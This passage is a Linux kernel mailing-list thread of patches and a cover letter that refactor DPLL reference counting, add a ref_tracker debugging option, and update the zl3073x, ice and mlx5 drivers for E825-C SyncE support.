*pin) xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8ed90dfc65f05..8fff048131f1d 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -240,6 +240,8 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, void dpll_device_unregister(struct dpll_device *dpll, const struct dpll_device_ops *ops, void *priv); +#define DPLL_PIN_IDX_UNSPEC U32_MAX + struct dpll_pin * dpll_pin_get(u64 
clock_id, u32 dev_driver_id, struct module *module, const struct dpll_pin_properties *prop); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:33 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. 
Add parsing for the "mux" string in the 'connection-type' pin property, mapping it to DPLL_PIN_TYPE_MUX. Recognizing this type in the driver allows these pins to be taken as parent pins for pin-on-pin registered pins coming from different modules (e.g. network drivers). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/prop.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/dpll/zl3073x/prop.c b/drivers/dpll/zl3073x/prop.c index 4ed153087570b..ad1f099cbe2b5 100644 --- a/drivers/dpll/zl3073x/prop.c +++ b/drivers/dpll/zl3073x/prop.c @@ -249,6 +249,8 @@ struct zl3073x_pin_props *zl3073x_pin_props_get(struct zl3073x_dev *zldev, props->dpll_props.type = DPLL_PIN_TYPE_INT_OSCILLATOR; else if (!strcmp(type, "synce")) props->dpll_props.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + else if (!strcmp(type, "mux")) + props->dpll_props.type = DPLL_PIN_TYPE_MUX; else dev_warn(zldev->dev, "Unknown or unsupported pin type '%s'\n", -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:34 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
Refactor the reference counting mechanism for DPLL devices and pins to improve consistency and prevent potential lifetime issues. Introduce internal helpers __dpll_{device,pin}_{hold,put}() to centralize reference management. Update the internal XArray reference helpers (dpll_xa_ref_*) to automatically grab a reference to the target object when it is added to a list, and release it when removed. This ensures that objects linked internally (e.g., pins referenced by parent pins) are properly kept alive without relying on the caller to manually manage the count. Consequently, remove the now redundant manual `refcount_inc/dec` calls in `dpll_pin_on_pin_{,un}register()`, as ownership is now correctly handled by the dpll_xa_ref_* functions. Additionally, ensure that `dpll_device_{,un}register()` takes/releases a reference to the device, so that the device object remains valid for the duration of its registration. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/dpll_core.c | 74 +++++++++++++++++++++++++++------------- 1 file changed, 50 insertions(+), 24 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 59081cf2c73ae..f6ab4f0cad84d 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -83,6 +83,45 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } +static void __dpll_device_hold(struct dpll_device *dpll) +{ + refcount_inc(&dpll->refcount); +} + +static void __dpll_device_put(struct dpll_device *dpll) +{ + if (refcount_dec_and_test(&dpll->refcount)) { + ASSERT_DPLL_NOT_REGISTERED(dpll); + WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); + xa_destroy(&dpll->pin_refs); + xa_erase(&dpll_device_xa, dpll->id); + WARN_ON(!list_empty(&dpll->registration_list)); + kfree(dpll); + } +} + +static void __dpll_pin_hold(struct dpll_pin *pin) +{ + refcount_inc(&pin->refcount); +} + +static void 
dpll_pin_idx_free(u32 pin_idx); +static void dpll_pin_prop_free(struct dpll_pin_properties *prop); + +static void __dpll_pin_put(struct dpll_pin *pin) +{ + if (refcount_dec_and_test(&pin->refcount)) { + xa_erase(&dpll_pin_xa, pin->id); + xa_destroy(&pin->dpll_refs); + xa_destroy(&pin->parent_refs); + xa_destroy(&pin->ref_sync_pins); + dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); + kfree_rcu(pin, rcu); + } +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -152,6 +191,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_pin_hold(pin); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -174,6 +214,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); + __dpll_pin_put(pin); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -231,6 +272,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_device_hold(dpll); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -253,6 +295,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -323,8 +366,8 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { + __dpll_device_hold(dpll); ret = dpll; - refcount_inc(&ret->refcount); break; } } @@ -347,14 +390,7 @@ EXPORT_SYMBOL_GPL(dpll_device_get); void dpll_device_put(struct dpll_device *dpll) { 
mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&dpll->refcount)) { - ASSERT_DPLL_NOT_REGISTERED(dpll); - WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); - xa_destroy(&dpll->pin_refs); - xa_erase(&dpll_device_xa, dpll->id); - WARN_ON(!list_empty(&dpll->registration_list)); - kfree(dpll); - } + __dpll_device_put(dpll); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -416,6 +452,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; + __dpll_device_hold(dpll); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -455,6 +492,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -666,8 +704,8 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { + __dpll_pin_hold(pos); ret = pos; - refcount_inc(&ret->refcount); break; } } @@ -690,16 +728,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); void dpll_pin_put(struct dpll_pin *pin) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&pin->refcount)) { - xa_erase(&dpll_pin_xa, pin->id); - xa_destroy(&pin->dpll_refs); - xa_destroy(&pin->parent_refs); - xa_destroy(&pin->ref_sync_pins); - dpll_pin_prop_free(&pin->prop); - fwnode_handle_put(pin->fwnode); - dpll_pin_idx_free(pin->pin_idx); - kfree_rcu(pin, rcu); - } + __dpll_pin_put(pin); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -740,8 +769,8 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { + __dpll_pin_hold(pin); ret = pin; - refcount_inc(&ret->refcount); break; } } @@ -893,7 +922,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, 
ret = dpll_xa_ref_pin_add(&pin->parent_refs, parent, ops, priv, pin); if (ret) goto unlock; - refcount_inc(&pin->refcount); xa_for_each(&parent->dpll_refs, i, ref) { ret = __dpll_pin_register(ref->dpll, pin, ops, priv, parent); if (ret) { @@ -913,7 +941,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, parent); dpll_pin_delete_ntf(pin); } - refcount_dec(&pin->refcount); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); unlock: mutex_unlock(&dpll_lock); @@ -940,7 +967,6 @@ void dpll_pin_on_pin_unregister(struct dpll_pin *parent, struct dpll_pin *pin, mutex_lock(&dpll_lock); dpll_pin_delete_ntf(pin); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); - refcount_dec(&pin->refcount); xa_for_each(&pin->dpll_refs, i, ref) __dpll_pin_unregister(ref->dpll, pin, ops, priv, parent); mutex_unlock(&dpll_lock); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:35 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
Add support for the REF_TRACKER infrastructure to the DPLL subsystem. When enabled, this allows developers to track and debug reference counting leaks or imbalances for dpll_device and dpll_pin objects. It records stack traces for every get/put operation and exposes this information via debugfs at: /sys/kernel/debug/ref_tracker/dpll_device_* /sys/kernel/debug/ref_tracker/dpll_pin_* The following API changes are made to support this: 1. dpll_device_get() / dpll_device_put() now accept a 'dpll_tracker *' (which is a typedef to 'struct ref_tracker *' when enabled, or an empty struct otherwise). 2. dpll_pin_get() / dpll_pin_put() and fwnode_dpll_pin_find() similarly accept the tracker argument. 3. Internal registration structures now hold a tracker to associate the reference held by the registration with the specific owner. All existing in-tree drivers (ice, mlx5, ptp_ocp, zl3073x) are updated to pass NULL for the new tracker argument, maintaining current behavior while enabling future debugging capabilities. 
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Petr Oros <poros@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * added missing tracker parameter to fwnode_dpll_pin_find() stub v3: * added Kconfig dependency on STACKTRACE_SUPPORT and DEBUG_KERNEL --- drivers/dpll/Kconfig | 15 +++ drivers/dpll/dpll_core.c | 98 ++++++++++++++----- drivers/dpll/dpll_core.h | 5 + drivers/dpll/zl3073x/dpll.c | 12 +-- drivers/net/ethernet/intel/ice/ice_dpll.c | 14 +-- .../net/ethernet/mellanox/mlx5/core/dpll.c | 13 +-- drivers/ptp/ptp_ocp.c | 15 +-- include/linux/dpll.h | 21 ++-- 8 files changed, 139 insertions(+), 54 deletions(-) diff --git a/drivers/dpll/Kconfig b/drivers/dpll/Kconfig index ade872c915ac6..be98969f040ab 100644 --- a/drivers/dpll/Kconfig +++ b/drivers/dpll/Kconfig @@ -8,6 +8,21 @@ menu "DPLL device support" config DPLL bool +config DPLL_REFCNT_TRACKER + bool "DPLL reference count tracking" + depends on DEBUG_KERNEL && STACKTRACE_SUPPORT && DPLL + select REF_TRACKER + help + Enable reference count tracking for DPLL devices and pins. + This helps debugging reference leaks and use-after-free bugs + by recording stack traces for each get/put operation. + + The tracking information is exposed via debugfs at: + /sys/kernel/debug/ref_tracker/dpll_device_* + /sys/kernel/debug/ref_tracker/dpll_pin_* + + If unsure, say N. 
+ source "drivers/dpll/zl3073x/Kconfig" endmenu diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f6ab4f0cad84d..627a5b39a0efd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -41,6 +41,7 @@ struct dpll_device_registration { struct list_head list; const struct dpll_device_ops *ops; void *priv; + dpll_tracker tracker; }; struct dpll_pin_registration { @@ -48,6 +49,7 @@ struct dpll_pin_registration { const struct dpll_pin_ops *ops; void *priv; void *cookie; + dpll_tracker tracker; }; static int call_dpll_notifiers(unsigned long action, void *info) @@ -83,33 +85,68 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } -static void __dpll_device_hold(struct dpll_device *dpll) +static void dpll_device_tracker_alloc(struct dpll_device *dpll, + dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&dpll->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_device_tracker_free(struct dpll_device *dpll, + dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&dpll->refcnt_tracker, tracker); +#endif +} + +static void __dpll_device_hold(struct dpll_device *dpll, dpll_tracker *tracker) +{ + dpll_device_tracker_alloc(dpll, tracker); refcount_inc(&dpll->refcount); } -static void __dpll_device_put(struct dpll_device *dpll) +static void __dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { + dpll_device_tracker_free(dpll, tracker); if (refcount_dec_and_test(&dpll->refcount)) { ASSERT_DPLL_NOT_REGISTERED(dpll); WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); xa_destroy(&dpll->pin_refs); xa_erase(&dpll_device_xa, dpll->id); WARN_ON(!list_empty(&dpll->registration_list)); + ref_tracker_dir_exit(&dpll->refcnt_tracker); kfree(dpll); } } -static void __dpll_pin_hold(struct dpll_pin *pin) +static void dpll_pin_tracker_alloc(struct dpll_pin *pin, dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + 
ref_tracker_alloc(&pin->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_pin_tracker_free(struct dpll_pin *pin, dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&pin->refcnt_tracker, tracker); +#endif +} + +static void __dpll_pin_hold(struct dpll_pin *pin, dpll_tracker *tracker) +{ + dpll_pin_tracker_alloc(pin, tracker); refcount_inc(&pin->refcount); } static void dpll_pin_idx_free(u32 pin_idx); static void dpll_pin_prop_free(struct dpll_pin_properties *prop); -static void __dpll_pin_put(struct dpll_pin *pin) +static void __dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { + dpll_pin_tracker_free(pin, tracker); if (refcount_dec_and_test(&pin->refcount)) { xa_erase(&dpll_pin_xa, pin->id); xa_destroy(&pin->dpll_refs); @@ -118,6 +155,7 @@ static void __dpll_pin_put(struct dpll_pin *pin) dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); dpll_pin_idx_free(pin->pin_idx); + ref_tracker_dir_exit(&pin->refcnt_tracker); kfree_rcu(pin, rcu); } } @@ -191,7 +229,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -214,7 +252,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); - __dpll_pin_put(pin); + __dpll_pin_put(pin, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -272,7 +310,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -295,7 +333,7 @@ dpll_xa_ref_dpll_del(struct xarray 
*xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -337,6 +375,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) return ERR_PTR(ret); } xa_init_flags(&dpll->pin_refs, XA_FLAGS_ALLOC); + ref_tracker_dir_init(&dpll->refcnt_tracker, 128, "dpll_device"); return dpll; } @@ -346,6 +385,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * @clock_id: clock_id of creator * @device_idx: idx given by device driver * @module: reference to registering module + * @tracker: tracking object for the acquired reference * * Get existing object of a dpll device, unique for given arguments. * Create new if doesn't exist yet. @@ -356,7 +396,8 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * * ERR_PTR(X) - error */ struct dpll_device * -dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) +dpll_device_get(u64 clock_id, u32 device_idx, struct module *module, + dpll_tracker *tracker) { struct dpll_device *dpll, *ret = NULL; unsigned long index; @@ -366,13 +407,17 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, tracker); ret = dpll; break; } } - if (!ret) + if (!ret) { ret = dpll_device_alloc(clock_id, device_idx, module); + if (!IS_ERR(ret)) + dpll_device_tracker_alloc(ret, tracker); + } + mutex_unlock(&dpll_lock); return ret; @@ -382,15 +427,16 @@ EXPORT_SYMBOL_GPL(dpll_device_get); /** * dpll_device_put - decrease the refcount and free memory if possible * @dpll: dpll_device struct pointer + * @tracker: tracking object for the acquired reference * * Context: Acquires a lock (dpll_lock) * Drop reference for a dpll device, if 
all references are gone, delete * dpll device object. */ -void dpll_device_put(struct dpll_device *dpll) +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_device_put(dpll); + __dpll_device_put(dpll, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -452,7 +498,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -492,7 +538,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -622,6 +668,7 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, &dpll_pin_xa_id, GFP_KERNEL); if (ret < 0) goto err_xa_alloc; + ref_tracker_dir_init(&pin->refcnt_tracker, 128, "dpll_pin"); return pin; err_xa_alloc: xa_destroy(&pin->dpll_refs); @@ -683,6 +730,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); * @pin_idx: idx given by dev driver * @module: reference to registering module * @prop: dpll pin properties + * @tracker: tracking object for the acquired reference * * Get existing object of a pin (unique for given arguments) or create new * if doesn't exist yet. 
@@ -694,7 +742,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); */ struct dpll_pin * dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, - const struct dpll_pin_properties *prop) + const struct dpll_pin_properties *prop, dpll_tracker *tracker) { struct dpll_pin *pos, *ret = NULL; unsigned long i; @@ -704,13 +752,16 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { - __dpll_pin_hold(pos); + __dpll_pin_hold(pos, tracker); ret = pos; break; } } - if (!ret) + if (!ret) { ret = dpll_pin_alloc(clock_id, pin_idx, module, prop); + if (!IS_ERR(ret)) + dpll_pin_tracker_alloc(ret, tracker); + } mutex_unlock(&dpll_lock); return ret; @@ -720,15 +771,16 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); /** * dpll_pin_put - decrease the refcount and free memory if possible * @pin: pointer to a pin to be put + * @tracker: tracking object for the acquired reference * * Drop reference for a pin, if all references are gone, delete pin object. * * Context: Acquires a lock (dpll_lock) */ -void dpll_pin_put(struct dpll_pin *pin) +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_pin_put(pin); + __dpll_pin_put(pin, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -752,6 +804,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); /** * fwnode_dpll_pin_find - find dpll pin by firmware node reference * @fwnode: reference to firmware node + * @tracker: tracking object for the acquired reference * * Get existing object of a pin that is associated with given firmware node * reference. 
@@ -761,7 +814,8 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); * * valid dpll_pin pointer on success * * NULL when no such pin exists */ -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker) { struct dpll_pin *pin, *ret = NULL; unsigned long index; @@ -769,7 +823,7 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, tracker); ret = pin; break; } diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index b7b4bb251f739..71ac88ef20172 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -10,6 +10,7 @@ #include <linux/dpll.h> #include <linux/list.h> #include <linux/refcount.h> +#include <linux/ref_tracker.h> #include "dpll_nl.h" #define DPLL_REGISTERED XA_MARK_1 @@ -23,6 +24,7 @@ * @type: type of a dpll * @pin_refs: stores pins registered within a dpll * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @registration_list: list of registered ops and priv data of dpll owners **/ struct dpll_device { @@ -33,6 +35,7 @@ struct dpll_device { enum dpll_type type; struct xarray pin_refs; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct list_head registration_list; }; @@ -48,6 +51,7 @@ struct dpll_device { * @ref_sync_pins: hold references to pins for Reference SYNC feature * @prop: pin properties copied from the registerer * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @rcu: rcu_head for kfree_rcu() **/ struct dpll_pin { @@ -61,6 +65,7 @@ struct dpll_pin { struct xarray ref_sync_pins; struct dpll_pin_properties prop; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct rcu_head rcu; }; diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c 
index 9eed21088adac..8788bcab7ec53 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1480,7 +1480,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props); + &props->dpll_props, NULL); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1503,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1534,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); pin->dpll_pin = NULL; } @@ -1708,7 +1708,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE); + THIS_MODULE, NULL); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1720,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } @@ -1743,7 +1743,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 53b54e395a2ed..64b7b045ecd58 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c 
@@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop); + &pins[i].prop, NULL); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin); + dpll_pin_put(rclk->pin, NULL); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); } /** @@ -3271,7 +3271,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3287,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 3ea8a1766ae28..541d83e5d7183 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ 
